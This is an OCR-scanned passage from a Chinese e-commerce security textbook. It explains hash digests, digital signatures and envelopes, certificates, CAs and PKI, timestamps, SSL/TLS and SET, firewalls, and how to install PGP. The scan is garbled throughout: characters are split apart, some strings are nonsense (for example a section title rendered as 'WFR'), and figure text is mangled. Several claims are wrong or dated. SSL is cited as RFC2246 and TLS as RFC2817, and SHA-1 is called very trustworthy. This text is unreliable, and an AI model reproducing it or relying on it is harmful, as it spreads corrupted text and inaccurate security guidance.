程 可见 ,接收 者 B 无 法 判断 所 收 到 的 信件 是 否 真 的 是 A 发 送 的 , 即 无 法 对 发 送 者 的 身份 
和 收 到 内 容 的 完整 性 进行 有 效 的 鉴别 。 为 进一步 解决 该 问题 ,可 采用 数字 摘要 和 数字 签 
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名 技术 。 

1. 数字 摘要 

数据 在 传输 过 程 中 可 能 被 自 改 或 伪造 ,可 采用 数字 摘要 技术 来 保证 数据 的 完整 性 和 一 
致 性 。 

数字 摘要 通常 也 称 为 消息 摘要 (Message Digest) ,其 算法 可 采用 单 向 Hash 函数 ,将 需 
要 进行 完整 性 保护 的 数据 信息 散 列 成 固定 长 度 (128 位 或 160 位 ) 的 消息 摘要 ,如 图 6. 3 
所 示 。 


单 向 散 列 Hash 函数 可 使 用 MD5、SHA-1 或 SHA-2 Hash 单 向 函数 
算法 ,MD5 算法 将 其 散 列 成 128 位 的 Hash 值 (消息 摘 
要 ),SHA-1 算法 散 列 为 160 位 的 Hash 值 , 比 MD5 R. z 
有 更 强 的 抗 穷 举 攻击 的 能 力 , 是 一 个 非常 值得 信赖 的 | 不 w 
Hash 函数 。SHA-2 算法 可 散 列 为 256 位 、384 位 或 512 & 
位 的 Hash 值 ,安全 性 更 高 。 i PETE 


MD5(Message-Digest Algorithm 5) 是 在 20 世纪 
90 年 代 初 由 MIT 的 计算 机 科学 实验 室 和 RSA Data 
Security Inc 发 明 , 经 MD2、MD3 和 MD4 发 展 而 来 的 。 

假设 Hash 函数 用 h() 表 示 , 要 完整 性 保护 的 消息 用 x 表示 ,数字 摘要 用 y 表示 , 则 产生 
数字 摘要 的 算法 可 表达 为 > 一 h(x) 。 

根据 单 向 散 列 函数 的 算法 特点 ,可 得 出 数字 摘要 y 与 x 具有 以 下 特点 。 

(1) 给 定 x, 很 容易 计算 出 y. 

(2) 给 定 y, 由 hO) =y ARMEA x, 

(3) 给 定 x1, 要 找到 另 一 个 消息 x2 ,使 其 满足 h(x1) 二 h(x2) 是 很 困难 的 。 

(4) 给 定 两 个 消息 xl 和 x2, 使 h(x1)= 二 h(x2) 是 很 困难 的 。 

由 于 数字 摘要 具有 以 上 特点 ,不 同 的 消息 生成 的 摘要 密 文 总 是 不 相同 的 ,而 同一 消息 生 
成 的 摘要 密 文 必定 是 相同 的 ,因此 ,数字 摘要 就 可 成 为 验 明 消息 * 真 身 ” 的 数字 指纹 。 

利用 数字 摘要 技术 ,发 送 者 在 加 密 发 送 消息 之 前 , 先 对 消息 生成 一 个 数字 摘要 ,接收 者 
收 到 消息 后 ,用 同样 的 Hash 函数 再 生成 一 个 数字 摘要 ,然后 将 这 两 个 摘要 进行 比较 , 若 相 
同 , 则 消息 在 传输 过 程 中 没有 被 算 改 或 伪造 ,这 样 就 可 保证 信息 的 完整 性 和 一 致 性 。 

2. 数字 签名 

数字 签名 (Digital Signature) 是 指使 用 密码 算法 对 待 发 的 数据 进行 加 密 处 理 , 生 成 一 段 
信息 ,附着 在 原文 上 一 起 发 送 , 供 接收 方 通过 该 信息 来 验证 所 收 到 的 数据 的 真实 性 。 这 段 信 
息 类 似 于 现实 生活 中 的 签名 或 印章 , 故 称 为 数字 签名 。 

可 综合 运用 数字 摘要 技术 和 公 钥 加 密 技 术 来 实现 数字 签名 ,为 便于 说 明 数 字 签 名 的 实 
现 方法 ,对 原文 的 加 密 传输 暂时 忽略 ,数字 签名 的 实现 方法 和 工作 原理 如 下 所 述 。 

d) 首先 将 原文 进行 单 向 Hash 函数 运算 ,生成 数字 摘要 密 文 MD_1。 

(2) 用 发 送 者 A 的 私 钥 (KevA) 对 生成 的 数字 摘要 MD_1 进行 加 密 , 从 而 得 到 数字 签 
名 DS。 

(3) 然后 将 数字 签名 DS 附着 在 原文 上 一 起 发 送 给 接收 者 B。 

(4) 接收 者 B 收 到 后 .首先 用 发 送 方 的 公 钥 Kps a 对 数字 签名 进行 解密 ,得 到 原始 的 数 
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图 6.3 生成 数字 摘要 
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字 摘 要 MD, 

(5) 然后 将 收 到 的 信息 原文 ,用 同样 的 单 向 Hash 函数 运算 ,得 到 一 个 新 的 数字 摘要 
MD_2。 

(6) 最 后 比较 MD_1 是 否 与 MD_2 相同 , 若 相 同 , 则 说 明 信 息 在 传输 过 程 中 没有 被 算 改 
或 伪造 , 另 一 方面 也 同时 说 明 该 信息 就 是 A 发 送 的 ,因为 数字 签名 使 用 A 的 公 钥 可 以 解 开 ， 
说 明 发 送 者 拥有 A 的 私 钥 。 

因此 ,利用 数字 签名 技术 不 仅 可 保证 数据 的 完整 性 ,而 且 可 对 数据 发 送 方 的 身份 进行 确 
认 , 并 可 防止 交易 的 抵赖 行为 ,具有 抗 否认 功能 。 其 作用 类 似 于 传统 商务 活动 中 的 手写 签名 
或 盖 印 章 ,可 用 于 接收 方 对 接收 到 的 消息 真 伪 进行 鉴别 ,并 作为 防 抵赖 的 证 据 。 利 用 数字 签 
名 技术 可 较 好 地 保证 电子 商务 交易 和 支付 的 安全 。 

数字 签名 的 实现 方法 和 工作 原理 如 图 6. 4 所 示 。 


发 方 的 私 钥 


数据 数字 | ! | 数字 | 数据 
摘要 签名 | ! | 签名 摘要 |、， 
ZE yE 
原 -| 原 | ! | 原 Hash\ 。 | 数据 | 
[>] 文 | f>] 算法 三 | 摘要 
t 


图 6.4 数字 签名 的 实现 过 程 


发 方 的 公 钥 


将 对 原文 的 加 密 传输 考虑 进去 , 则 信息 安全 传输 的 解决 方案 如 下 。 

(1) 数据 发 送 方 A 对 要 发 送 的 信息 进行 单 向 Hash 运算 ,生成 数字 摘要 MD_1。 

D 发 送 方 A 用 自己 的 私 钥 KevA 对 数字 摘要 MD_1 进行 加 密 , 生 成 数字 签名 DS. 

(3) 发 送 方 将 信息 明文 ,数字 签名 和 发 送 者 的 数字 证 书 放 在 一 起 ,通过 对 称 加 密 算法 ， 
用 密 钥 SK 对 其 加 密 , 生 成 密 文 E。 

(4) 通过 接收 者 的 数字 证 书 , 获 得 接收 者 B 的 公 钥 Kps_s .然后 用 接收 者 的 公 钥 (Kpss) 
对 密 钥 SK 进行 加 密 , 生 成 数字 信封 DE, 

(5) 发 送 方 将 生成 的 密 文 E 和 数字 信封 DE 一 起 发 送 给 接收 者 B。 

(6) 接收 者 B 收 到 数据 后 ,首先 用 自己 的 私 钥 Kevs 解 开 数 字 信 封 , 获 得 对 称 加 密 的 密 
钥 SK。 

(7) 用 解密 得 到 的 密 钥 SK 对 密 文王 进行 对 称 解密 运算 ,得 到 信息 明文 .数字 签名 和 发 
送 方 的 数字 证 书 。 

(8) 用 发 送 方 的 公 钥 解密 数字 签名 DS, 获 得 原始 的 数字 摘要 MD_1。 

(9) 接收 者 B 用 收 到 的 信息 明文 ,用 同样 的 单 向 Hash 运算 生成 一 个 新 的 数字 摘 
要 MD _2。 

(10) 比较 数字 摘要 MD_2 和 MD_1 是 否 相同 ,车 相同 , 则 说 明 收 到 的 信息 正确 无 误 , 否 
则 信息 有 误 。 

数据 安全 传输 的 整体 解决 方案 如 图 6. 5 所 示 。 
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6.2.3 数字 证 书 与 认证 中 心 


为 便于 管理 用 户 的 公 钥 和 对 公 钥 所 属 人 的 身份 认证 ,同时 也 为 了 建立 一 种 信任 机 制 ,使 
交易 及 支付 各 方 能 够 确认 彼此 身份 的 真实 性 ,这 就 要 求 参 加 电子 商务 活动 的 各 方 必须 有 一 
个 可 以 被 验证 的 身份 标识 ,这 个 标识 即 数 字 证 书 。 在 电子 交易 的 各 个 环节 ,交易 的 各 方 都 需 
验证 对 方 数字 证 书 的 有 效 性 ,从 而 解决 相互 间 的 信任 问题 ,并 获得 对 方 的 公 钥 。 

颁发 数字 证 书 并 对 证 书 的 真实 性 和 有 效 性 进行 认证 并 签名 的 机 构 称 为 证 书 授权 中 心 
(Certificate Authority.CA) 或 称 认证 中 心 。 

提供 公 钥 加 密 和 数字 签名 服务 的 系统 就 称 为 公 钥 基础 设施 (Public Key Infrastructure, 
PKD) ,建立 PKI 的 目的 是 管理 密 钥 和 数字 证 书 ,PKI 系 统 的 核心 元 素 是 数字 证 书 , 核 心 执行 
者 是 CA 认证 机 构 。 

1. 数字 证 书 

数字 证 书 是 一 个 由 证 书 主体 (证 书 拥有 者 ) 的 身份 信息 ,用户 公 钥 、 密 钥 的 有 效 时 间 、 发 
证 机 关 ( 证 书 授权 中 心 CA) 名 称 、 证 书 序 列 号 和 证 书 授权 中 心 对 该 证 书 的 数字 签名 等 数据 
构成 的 一 个 权威 性 的 电子 文件 。 

CA 中 心 为 每 个 使 用 公开 密 钥 的 用 户 发 放 一 个 数字 证 书 ,数字 证 书 的 作用 是 证 明证 书 
拥有 者 身份 的 真实 性 ,并 证 明 该 用 户 合法 拥有 证 书 中 列 出 的 公开 密 钥 。 因 此 ,利用 数字 证 书 
就 可 实现 将 用 户 的 真实 身份 信息 与 用 户 的 公开 密 钥 对 应 起 来 ,成 为 用 户 网 上 交易 的 一 个 身 
份 证 明 , 从 而 为 交易 建立 起 一 种 信任 机 制 。 

CA 对 证 书 的 数字 签名 可 以 确保 证 书 内 容 的 真实 性 和 有 效 性 ,同时 也 使 得 攻击 者 无 法 
伪造 和 自 改 数字 证 书 。 

数字 证 书 是 公开 的 ,发 送 者 会 将 自己 的 数字 证 书 的 一 份 复制 连同 密 文 . 摘 要 放 在 一 起 ， 
发 送 给 接收 方 , 接 收 方 通过 验证 证 书 上 的 数字 签名 来 检查 此 证 书 的 有 效 性 (用 CA 机 构 的 公 
钥 来 验证 该 证 书 上 的 签名 即 可 ) ,如 果 证 书 检 查 正确 ,就 可 相信 该 证 书 的 拥有 者 身份 的 真实 
性 和 证 书 中 的 公 钥 的 确 属于 该 用 户 。 

证 书 从 用 途上 可 细 分 为 签名 证 书 和 加 密 证 书 。 签 名 证 书 主要 用 于 对 用 户 信息 进行 签 
名 ,以 保证 信息 的 不 可 否认 性 ; 加 密 证 书 主 要 用 于 对 用 户 传送 信息 进行 加 密 , 以 保证 信息 的 
真实 性 和 完整 性 。 

从 中 可 见 ,这 种 建立 在 公 钥 基础 设施 之 上 的 数字 证 书 成 为 了 电子 商务 安全 体系 的 核心 。 
证 书 格式 和 证 书 内 容 采 用 X. 509 国际 标准 。 

2. 认证 中 心 

为 保证 数字 证 书 内 容 的 真实 性 和 有 效 性 ,数字 证 书 必须 由 具有 合法 性 、 权 威 性 、 可 信赖 
性 及 公正 性 的 第 三 方 认 证 机 构 来 进行 颁发 和 管理 。 证 书 的 认证 机 构 即 认证 中 心 ,负责 为 电 
子 商务 环境 中 的 各 个 实体 颁发 数字 证 书 , 以 证 明 各 实体 身份 的 真实 性 ,并 负责 在 交易 中 检验 
和 管理 数字 证 书 。CA 具有 证 书 申请 、 证 书 审批 ,签发 证 书 及 证 书 下 载 、 证 书 归档 \ 证 书 注 
销 \ 证 书 更 新 \ 证 书 废止 列表 (CRL) 管 理 .CA 自身 密 钥 管理 ,时间 戳 服 务 等 功能 ,如 图 6. 6 
所 示 。 

认证 中 心 是 电子 商务 安全 体系 中 的 核心 环节 ,是 电子 交易 中 信赖 的 基础 ,通过 自身 的 注 
册 审 核 体系 ,检查 核实 进行 证 书 申请 的 用 户 身份 和 各 项 相关 信息 。 交 易 各 方 通过 检验 对 方 
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密 钥 自动 更 新 
图 6.6 CA 认证 中 心 的 功能 


数字 证 书 的 有 效 性 ,就 可 识别 对 方 身份 的 真实 性 ,从 而 建立 起 彼此 间 的 信任 关系 。 通 过 数字 
证 书 还 可 方便 地 获得 对 方 的 公开 密 钥 , 便 于 对 数据 进行 解密 。 数 字 证 书 的 采用 和 认证 机 构 
的 建立 ,可 很 好 地 保障 电子 商务 交易 .电子 支付 和 结算 过 程 的 安全 。 

国内 最 权威 的 认证 中 心 是 中 国 金 融 认 证 中 心 (China Financial Certification Authority, 
CEFCA) , 它 是 由 中 国人 民 银 行 牵头 ,联合 中 国 工商 银行 .中 国 银行 .中 国 农业 银行 ,中国 建设 
银行 .交通 银行 .招商 银行 、 中 信和 实业 银行 .华夏 银行 ,广东 发 展 银行 、 深 圳 发 展 银行 光大 银 
行 . 民 生 银 行 12 家 商业 银行 参与 建设 ,由 银行 卡 信息 交换 总 中 心 承建 ,于 2000 年 6 月 29 日 
由 中 国人 民 银 行 和 国家 信息 安全 管理 机 构 审 批 成 立 的 ,是 国内 唯一 一 家 国家 级 的 第 三 方 权 
威 金融 认证 机 构 。 

CA 认证 体系 可 分 为 SET CA 和 Non-SET CA 两 大 体系 ,Non-SET CA 基于 PKI 机 制 
建立 ,通常 也 称 为 PKI CA 系统 ,其 宗旨 是 向 各 种 用 户 颁 发 不 同 种 类 的 数字 证 书 。 

Non-SET CA 系统 分 为 3 层 结构 ,第 一 层 为 i 
ROOT CA ,第 二 层 为 政策 CA, 第 三 层 为 运营 CA, 其 T 
系统 架构 如 图 6.7 所 示 。 政策 CA 

除 CFCA 认证 中 心 外 , 稍 有 实力 的 商业 银行 也 
都 组 建 了 自己 的 认证 中 心 , 各 省 市 各 地 区 以 及 大 中 
型 企业 也 组 建 有 自己 的 认证 中 心 , 还 有 众多 第 三 方 
认证 服务 机 构 ( 如 天 威 诚信 ) ,目前 我 国 的 认证 中 心 图 6.7 Non-SET CA 体系 
数量 比较 多 。 

3. 公 钥 基础 设施 PKI 

PKI 是 基于 公 钥 加 密 技术 为 电子 商务 的 开展 提供 安全 服务 的 一 种 体系 ,是 一 种 基础 设 
施 ,是 创建 、 颁 发. 管理, 存档、 注销 证 书 所 涉及 的 所 有 软件 硬件 、 人 力 资源 、 相 关 政 策 和 操作 
程序 的 集合 体 。 

网 络 通 信和 网 上 交易 通过 PKI 来 保证 安全 ,一 个 机 构 通 过 采用 PKI 框 架 来 管理 密 钥 和 
证 书 , 就 可 建立 一 个 安全 的 网 络 环境 。PKI 的 核心 元 素 是 数字 证 书 , 核 心 执行 者 是 CA 认证 
中 心 。 

PKI 采用 证 书 管理 公 钥 ,通过 第 三 方 权 威 可 信 的 认证 中 心 CA ,将 用 户 的 公 钥 和 用 户 的 
身份 标识 信息 (如 姓名 、E-mail、 身 份 证 号 等 ) 捆 绑 在 一 起 ,在 Internet 上 验证 用 户 的 身份 并 
为 对 方 提供 该 用 户 的 公 钥 。 用 户 的 私 钥 一 般 采 用 另 一 独立 文件 加 密 保存 ,可 保存 在 用 户 的 
硬盘 上 ,也 可 保存 在 移动 U 盘 中 。 
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建立 PKI 的 主要 目的 是 通过 自动 管理 密 钥 和 证 书 , 为 用 户 建立 起 一 个 安全 的 网 络 运行 
环境 ,使 用 户 可 以 在 多 种 应 用 环境 下 ,方便 地 使 用 加 密 和 数字 签名 技术 ,保证 网 上 数据 的 机 
密 性 、 完 整 性 有 效 性 和 抗 否认 性 。 

一 个 有 效 的 PKI 系统 必须 是 安全 和 透明 的 ,用 户 在 获得 加 密 和 数字 签名 服务 时 ,不 需 
要 详细 了 解 PKI 是 怎样 管理 证 书 和 密 钥 的 。 一 个 典型 .完整 有效 的 PKI 应 用 系统 至 少 应 
具有 以 下 功能 : 公 钥 密码 证 书 管理 ; 加 黑 名 单 的 发 布 和 管理 ; @ 密 钥 的 备份 和 恢复 ; 
图 自动 更 新 密 钥 ; @@ 自 动 管 理 历 史 密 钥 ; @ 支 持 交 又 认证 。 

PKI 由 公开 密 钥 密码 技术 数字 证 书证 书 发 放 机 构 (CA) 和 关于 公开 密 钥 的 安全 
策略 等 基本 成 分 组 成 ,使 用 PKI 基 础 设施 可 较 好 地 解决 目前 基于 Internet 的 网 络 安全 
问题 。 


6.2.4 WFR 


在 合同 中 ,用 户 的 签名 和 合同 签署 的 时 间 都 至 关 重 要 。 数 字 签 名 解决 了 用 户 对 电子 文 
件 发 表 的 不 可 和 否认 性 ,由 于 用 户 计 算 机 的 时 间 是 可 随意 更 改 的 ,不 具备 权威 合法 性 ,是 不 可 
信赖 的 ,因此 电子 文件 发 表 的 时 间 不 能 取 自 客户 的 计算 机 ,交易 各 方 所 签发 的 文件 时 间 必 须 
都 来 自 第 三 方 权威 可 信任 机 构 所 提供 的 电子 时 间 , 以 保证 电子 文件 发 布 时 间 的 权威 性 和 公 
Ett, 

CA UEP b EAT EE ER DTS) ,通过 该 项 服务 ,可 实现 对 电子 文件 发 布 
时 间 的 安全 保护 。 因 此 对 电子 文件 加 时 间 戳 ,可 由 认证 中 心 来 完成 。 

时 间 戳 的 产生 过 程 为 : 用 户 首先 将 需要 加 时 间 截 的 文件 用 单 向 Hash( 哈 希 ) 编 码 形成 
数字 摘要 ,然后 将 该 摘要 发 送 到 DTS,DTS 在 加 入 了 收 到 数字 摘要 的 日 期 和 时 间 信 息 后 ,再 
对 该 数字 摘要 进行 数字 签名 ,然后 送 回 用 户 。 因 此 ,时 间 截 (Time-stamp) 是 一 个 经 加 密 后 
形成 的 凭证 文档 ,包括 3 个 部 分 , 即 需 加 时 间 戳 的 文件 的 数字 摘要 、DTS 收 到 数字 摘要 文件 
的 日 期 和 时 间 、.DTS 数字 签名 。 

利用 时 间 截 可 有 效 防范 文件 签发 者 在 时 间 上 作 整 的 可 能 ,文件 发 布 的 时 间 具 有 不 可 和 否 
认 性 。 


6.2.5 SSL/TLS 安全 协议 


除了 从 电子 商务 应 用 层面 解决 和 提高 其 安全 性 外 .网 络 传 输 也 要 采用 安全 通信 协议 ,来 
保障 传输 的 安全 性 ,比如 使 用 SSL/TLS 协议 。 

1. SSL/TLS 协议 

SSL 是 Secure Socket Layer 的 缩写 ,是 网 景 (Netscape) 公 司 设计 的 基于 Web 应 用 的 安 
全 协议 , 称 为 安全 套 接 层 协议 ,是 一 个 面向 连接 的 协议 ,是 位 于 传输 层 (TCP) 与 应 用 层 
CHTTP) 之 间 的 一 个 可 选 层 。 

SSL 协议 (RFC2246) 最 新 的 版 本 为 第 3 版 ,TLS(Transport Layer Security,RFC2817) 
是 SSL 协议 的 升级 版 ,目前 为 第 1 版 ,进一步 强化 了 通信 协议 ,使 加 密 功 能 更 趋 完善 。IE 7 
将 放弃 使 用 SSL ,而 采用 新 的 TLS 协议 ,目前 WAP 2. 0 也 采用 TLS 协议 。 在 技术 层面 ， 
TLS 1.0 与 SSL 3. 0 的 差别 较 小 。 

利用 SSL/TLS 协议 在 传输 层 和 应 用 层 之 间 建 立 一 个 安全 通信 层 ,在 数据 收发 之 前 , 首 
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先进 行 双向 或 单 向 身份 认证 ,协商 传输 用 的 加 密 算法 和 会 话 密 钥 ,建立 SSL 连接 ,从 而 为 应 
用 层 提供 安全 的 传输 通道 。 在 该 通道 上 可 透明 加 载 任何 高 层 应 用 协议 (如 HTTP、FTP、 
TELNET 等 )。 在 随后 的 传输 过 程 中 ,就 可 自动 完成 加 密 操 作 , 以 保证 信息 的 保密 性 和 完 
整 性 。 

SSL 协议 分 为 两 部 分 : Handshake Protocol 和 Record Protocol, 其 中 Handshake 
Protocol 用 来 协商 密 钥 ,并 完成 客户 端 与 服务 器 端的 会 话 建立 ,协议 的 大 部 分 内 容 就 是 通信 
双方 如 何 利用 该 协议 来 安全 地 协商 出 一 份 加 密 密 钥 ; Record Protocol 则 定义 传输 数据 的 封 
装 格式 。 

使 用 http 十 ssl 协议 来 访问 网 页 时 ,其 URL 协议 名 应 使 用 https:// ,而 不 是 http://, 服 
务 端口 默认 为 443 ,而 不 是 http 的 80 端口 。 其 通信 过 程 如 下 。 

(1) 用 户 : 在 浏览 器 的 地 址 栏 里 输入 https://www. sslserver. com, 

(2) HTTP 层 : 将 用 户 的 需求 翻译 成 HTTP 请 求 ,如 


GET /index. htm HTTP/1. 1 


Host www. sslserver. com 


(3) SSL 层 : 借助 下 层 协议 (TCP) 的 信道 ,安全 协商 出 一 份 加 密 密 钥 ,并 用 此 密 钥 来 加 
密 HTTP 请 求 。 

(4) TCP 层 : 与 被 访问 的 Web server 的 443 端口 建立 连接 ,传递 SSL 处 理 后 的 加 密 
数据 。 

SSL 通过 在 TCP 之 上 建立 一 个 加 密 通 道 , 通 过 这 一 层 的 数据 都 经 过 了 加 密 ,从 而 达到 
保密 的 效果 。 对 于 接收 端 ,其 过 程 与 此 正好 相反 。 

SSL 的 密 钥 协 商 过 程 如 下 。 

SSL 客户 端 ( 也 是 TCP 的 客户 端 ) 在 TCP 链接 建立 之 后 ,发 出 一 个 ClientHello 来 发 起 
握手 ,这 个 消息 里 面包 含 了 自己 可 实现 的 算法 列表 和 其 他 一 些 需要 的 消息 ; SSL 的 服务 器 
端 (443 端口 ) 会 回应 一 个 ServerHello, 这 里 面 确定 了 这 次 通信 所 需要 的 算法 ,然后 发 过 去 
自己 的 证 书 (里 面包 含 了 身份 和 自己 的 公 钥 ) 。Client 在 收 到 这 个 消息 后 会 生成 一 个 秘密 消 
息 , 用 SSL 服务 器 的 公 钥 加 密 后 传 过 去 ,SSL 服务 器 端 用 自己 的 私 钥 解密 后 ,会 话 密 钥 协 商 
成 功 ,双方 就 可 以 用 同一 份 会 话 密 钥 来 进行 加 密 通信 了 。 

SSL 协议 使 用 公开 密 钥 加 密 .数字 签名 和 X. 509 数字 证 书 技术 来 保护 信息 传输 的 机 密 
性 和 完整 性 。 由 于 SSL 不 对 应 用 层 的 消息 进行 数字 签名 ,因此 不 能 提供 交易 的 不 可 否认 
性 ,主要 解决 传输 过 程 的 安全 性 ,适用 于 点 对 点 之 间 的 信息 安全 传输 。 这 是 该 协议 在 电子 商 
务 应 用 中 的 最 大 不 足 。 目 前 国内 银行 大 多 采用 SSL-128 加 密 方式 。 

目前 电子 商务 交易 平台 和 电子 商务 网 站 多 采用 B/S 结构 ,因此 ,采用 基于 数字 证 书 技 
术 的 SSL 通信 协议 就 可 获得 很 好 的 安全 保护 。 

2. SET 协议 

SET 是 Secure Electronic Transaction 的 缩写 , 称 为 安全 电子 交易 .是 专门 为 电子 商务 
应 用 而 设计 的 一 个 协议 。 

针对 电子 商务 应 用 存在 的 安全 问题 ,由 美国 Visa 和 MasterCard 两 大 信用 卡 组 织 联 合 
国际 上 多 家 科技 机 构 ,共同 制定 了 基于 Internet 的 以 银行 卡 为 基础 进行 在 线 交 易 的 安全 标 
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准 ,这 就 是 安全 电子 交易 (SET)。 它 采用 公 钥 密码 加 密 和 X. 509 数字 证 书 标准 ,来 保障 网 
上 购物 信息 的 安全 性 。 由 于 SET 提供 了 消费 者 、 商 家 和 银行 彼此 间 的 认证 ,确保 了 交易 数 
据 的 安全 性 、 完 整 性 和 交易 的 不 可 否认 性 ,并 特别 具有 不 将 消费 者 的 银行 卡号 暴露 给 商家 的 
优点 ,成 为 目前 公认 的 信用 卡 ( 贷 记 卡 )/ 借 记 卡 网 上 交易 的 国际 安全 标准 。SET 2. 0 可 支持 
借 记 卡 的 网 上 交易 。 中 国 银行 长 城 借 记 卡 采用 的 是 SET 1.2。 

SET 协议 比 SSL 协议 要 复杂 ,在 建立 过 程 中 必须 有 银行 参与 ,因此 应 用 不 如 SSL 广 
泛 。 我 国 大 多 数 银行 主要 采用 的 是 基于 PKI/CA 的 数字 证 书 技术 和 SSL 加 密 方式 。 


6.2.6 使 用 防火 墙 技术 解决 网 络 层 的 安全 


电子 商务 的 数据 是 通过 开放 的 Internet 网 络 来 进行 传输 的 ,为 保证 网 络 和 系统 的 安全 ， 
不 受 黑客 和 木马 病毒 的 攻击 ,可 通过 在 网 络 的 边界 安装 使 用 防火 墙 来 解决 。 

对 于 用 户 端 主机 ,可 安装 使 用 软件 防火 墙 ,比如 天 网 防火 墙 软件 或 瑞星 防火 墙 软件 。 对 
于 电子 商城 和 银行 系统 , 则 应 在 网 络 边 界 安装 使 用 基于 硬件 的 防火 墙 产 品 ,以 保证 安装 使 用 
防火 墙 后 ,不 对 网 络 速度 造成 影响 。 

防火 墙 技术 是 目前 解决 网 络 安全 的 一 种 较 好 的 方案 。 通 过 在 防火 墙 规则 中 配置 IP 包 
过 滤 规 则 ,可 对 进出 网 络 的 IP 数据 包 进 行 过 滤 , 以 保护 网 络 和 数据 通信 的 安全 。 


6.3 使 用 PGP 软件 加 解密 数据 


6.3.1 PGP 简介 


PGP(Pretty Good Privacy) 是 基于 RSA 公 匙 加 密 体系 的 加 密 软件 ,是 目前 全 球 项 级 的 
加 密 系统 之 一 ,其 核心 功能 是 文件 加 密 、 通 信 加 密 和 数字 签名 ,可 用 于 各 类 数据 的 加 密 / 解 
密 、 签 名 与 验证 等 。 

PGP 的 创始 人 是 美国 的 Phil Zimmermann, 从 20 世纪 80 年 代 中 期 开始 编写 ,目前 最 新 
版 本 为 10. 03 ,官方 网 站 为 www. pgp. com, PGP 的 主要 功能 ,特色 如 下 。 

(1) PGP 密 钥 管 理 。 利 用 PGP 密 钥 功能 ,可 以 创建 查看 ,维护 和 管理 密 钥 , 并 可 将 其 
他 人 的 公 钥 导入 自己 的 密 钥 环 中 ,以 方便 对 该 用 户 发 送 加 密 数据 。 

由 于 PGP 采用 非 对 称 加 密 技 术 ,数据 的 保密 性 可 以 说 是 坚不可摧 。 在 重 装 计算 机 操作 
系统 之 前 ,一 定 要 记得 备份 “我 的 文档 ”中 的 PGP 文件 夹 中 的 所 有 文件 ,该 文件 夹 保 存 着 用 
户 的 私 钥 。 一 方面 ,由 于 私 钥 较 长 ,没有 规律 性 ,不 便于 记忆 ; 另 一 方面 ,也 为 了 保护 私 钥 ， 
PGP 对 私 钥 进行 加 密 存 储 , 并 要 求 用 户 设置 一 个 用 于 保护 私 钥 的 口令 。 以 后 ,凡是 需要 使 
用 用 户 私 钥 的 操作 ,都 会 要 求 用 户 输入 私 钥 的 保护 口令 。 因 此 ,该 口令 也 是 必须 牢记 的 。 若 
用 户 丢 失 私 钥 文件 和 私 钥 的 保护 口令 , 则 以 前 加 密 的 数据 将 无 法 解密 还 原 。 

(2) PGP 消息 。 通 过 创建 和 配置 PGP 消息 服务 (邮件 加 密 代 理 网 关 ) ,可 实现 对 邮件 通 
信 的 自动 加 密 或 解密 。 

(3) PGP 阅读 器 。PGP 阅读 器 可 用 于 解密 和 阅读 未 解密 的 邮件 (包括 邮件 正文 和 附 
件 ), 其 加 密 的 邮件 文件 扩展 名 为 . pgp。 另 外 ,也 可 用 于 对 其 他 PGP 加 密 文件 (. pgp) 的 解 
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密 和 阅读 。 

(4) PGP 压缩 包 。 利 用 该 功能 ,可 创建 出 具有 更 高 安全 性 的 压缩 包 文件 ,压缩 算法 采用 
与 PKZIP 兼容 的 算法 。 另 外 ,还 可 创建 自 解密 压缩 文档 (self-decrypting archives, SDA) 。 

解密 者 只 要 获得 自 解密 压缩 文档 的 解密 密码 ,不 需要 事先 安装 PGP 软件 ,就 可 实现 对 
文档 的 解密 还 原 。 

(5) PGP 磁盘 。PGP 磁盘 提供 了 创建 安全 的 虚拟 磁盘 、 全 盘 加 密 和 粉碎 可 用 空间 三 方 
面 的 功能 。 利 用 创建 虚拟 磁盘 功能 ,可 创建 出 一 个 扩展 名 为 . pgd 的 磁盘 映像 文件 ,该 文件 
用 PGP Disk 功能 加 载 后 ,将 以 新 分 区 (虚拟 磁盘 ) 的 形式 出 现 。 当 虚拟 盘 不 使 用 被 卸载 后 ， 

— 呈现 ,可 有 效 防 止 未 经 许可 的 非 授权 访问 。 

(6) PGP 网 络 共享 。 对 共享 文件 夹 中 的 内 容 进 行 全 面 的 加 密 保护 。 


6.3.2 安装 与 配置 PGP 


PGP 的 版 本 种 类 较 多 ,目前 最 新 版 本 为 10.0.3。 下 面 以 PGP Desktop 10. 0. 2 纪念 版 
为 例 , 介 绍 PGP 的 安装 和 配置 方法 。 

1. 安装 PGP 软件 

双击 下 载 得 到 的 安装 程序 ,启动 安装 向 导 。 在 首 个 安装 界面 中 选择 “简体 中 文 ? 选 项 , 开 
始 启动 中 文 界 面 的 安装 向 导 。 

在 “许可 协议 ”界面 中 色 选 “我 接受 该 许可 证 协议 ”选项 ,然后 单 击 * 下 一 步 按 钮 。 在 “5 
示 发 行 说 明 ” 界 面 中 ,保持 默认 的 设置 .直接 单 击 * 下 一 步 ? 按 钮 继续 。 下 来 安装 程序 开始 

复制 文件 和 配置 程序 ,处理 完毕 后 ,安装 程序 将 弹出 消息 框 必须 重新 启动 系统 才能 使 

对 PGP Desktop 做 出 的 配置 修改 生效 ”。 此 时 , 单 击 * 是 "按钮 ,重启 系统 。 

2. 配置 PGP 

PGP 软件 安装 重启 系统 后 ,会 自动 启动 *PGP 设置 助手 ”界面 ,如 图 6.8 所 示 。 


PGP 设置 助手 i 
启用 pop. 


如果 悠 不 打算 从 此 账户 使 用 PGP ， 便 没 必要 完成 配置 向导 。 加 果 您 以 后 改变 主意 ,只 
需 运 行 PGP Desktop 应 用 程序 。 


修 想 要 从 此 账户 启用 PGP 以 让 其 可 用 ? 


° Wo 
Caw 


mm j m] 


图 6.8 “PGP 设置 助手 界面 
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配置 的 第 一 步 是 设置 是 否 允 许 当前 Windows 系统 账户 启用 PGP 软件 。 通 常 应 选择 
是 ”, 然 后 单 击 * 下 一 步 ?按钮 ,此 时 将 显示 如 图 6.9 所 示 的 对 话 框 。 


许可 助手 : 启用 许可 的 功能 


此 许可 证 号 能 使 PGP 功 能 开启 并 被 关联 到 这 里 输入 的 名 字 ， 短 织 和 邮件 地 址 。 
如果 您 先前 已 经 用 过 您 的 许可 证 ， 保 证 输入 信息 和 先前 的 一 样 - 


SW: 
RO: 
邮件 地 址 (E) : 
确认 邮件 地 址 (QO : 


[FE mm | ww | 


图 6.9 配置 启用 许可 


在 如 图 6.9 所 示 的 对 话 框 中 输入 用 户 名 称 、 所 属 的 组 织 和 电子 邮件 地 址 ,然后 单 击 “ 下 
- 步 " 按 钮 ,此 时 将 显示 如 图 6. 10 所 示 的 对 话 框 ,要 求 输入 许可 证 号 码 。 


许可 助手 : 输入 许可 证 


